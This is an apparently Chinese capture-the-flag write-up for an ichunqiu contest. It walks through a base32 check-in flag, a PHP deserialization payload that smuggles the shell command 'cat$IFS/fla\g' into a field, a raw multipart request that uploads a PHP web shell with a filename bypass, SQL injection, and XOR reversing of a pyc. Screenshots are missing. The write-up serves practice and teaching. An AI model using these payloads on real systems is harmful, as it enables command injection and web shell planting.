1签到题
MZWGCZ33GM2TEMRSMQZTALJUGM4WKLJUMFTGELJZGFTDILLBMJSWEYZXGNTGKMBVMN6Q
base32解密
flag{35222d30-439e-4afb-91f4-abebc73fe05c}
2 web1 what are you doing?
查找源代码提示
图片.png
然后还是提示
图片.png
继续提示,在本地才能出现flag
图片.png
抓包
图片.png
图片.png
图片.png
不能在浏览器中,用linux下的curl
图片.png
3.web2 Can you hack me?
反序列化
打开题目,.index.php.swp是隐藏文件,丢linux下复原,代码审计
图片.png
图片.png
存在反序列化漏洞
构造:
O:4:"come":2:{s:12:"�come�method";s:4:"echo";s:10:"�come�args";a:1:{s:4:"host";s:21:"'test'&&cat$IFS/fla\g";}}
<<==>>
O%3A4%3A%22come%22%3A2%3A%7Bs%3A12%3A%22%00come%00method%22%3Bs%3A4%3A%22echo%22%3Bs%3A10%3A%22%00come%00args%22%3Ba%3A1%3A%7Bs%3A4%3A%22host%22%3Bs%3A21%3A%22%27test%27%26%26cat%24IFS%2Ffla%5Cg%22%3B%7D%7D
4. web3 文件
图片.png
构造
POST / HTTP/1.1
Host: 58adf61f68fb45f0b0460cee261c852baf932a4c44074d4b.game.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://10b9f9997c9c47bdb733fdbf1d0c9aab493a60e04f7a4ade.game.ichunqiu.com/
Content-Length:500
Connection: close
Cookie: UM_distinctid=166967c8b99b-0f246b41d4a386-143c7340-1fa400-166967c8b9ba4
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=--------48762581
----------48762581
Content-Disposition: form-data; name="file"; filename="429.php"
Content-Type: application/octet-stream
@<?php
@eval(system("cat /flag"));
?>
----------48762581
Content-Disposition: form-data; name="submit"
�交
----------48762581
Content-Disposition: form-data; name="file[0]"
429.php
----------48762581
Content-Disposition: form-data; name="file[2]"
php/.
----------48762581
Content-Disposition: form-data; name="hehe"
§1§.php
----------48762581--
爆破:
图片.png
图片.png
5 web4
sql注入,爆破后台密码
adminpassword
图片.png
图片.png
然后文件上传,后面,,,,
6.misc easy_py
先分析pyc文件,不能反编译,手动加载,获取pyopcode
查看代码和常量
image.png
image.png
猜测为异或操作,将常量与‘f’异或
image.png
image.png
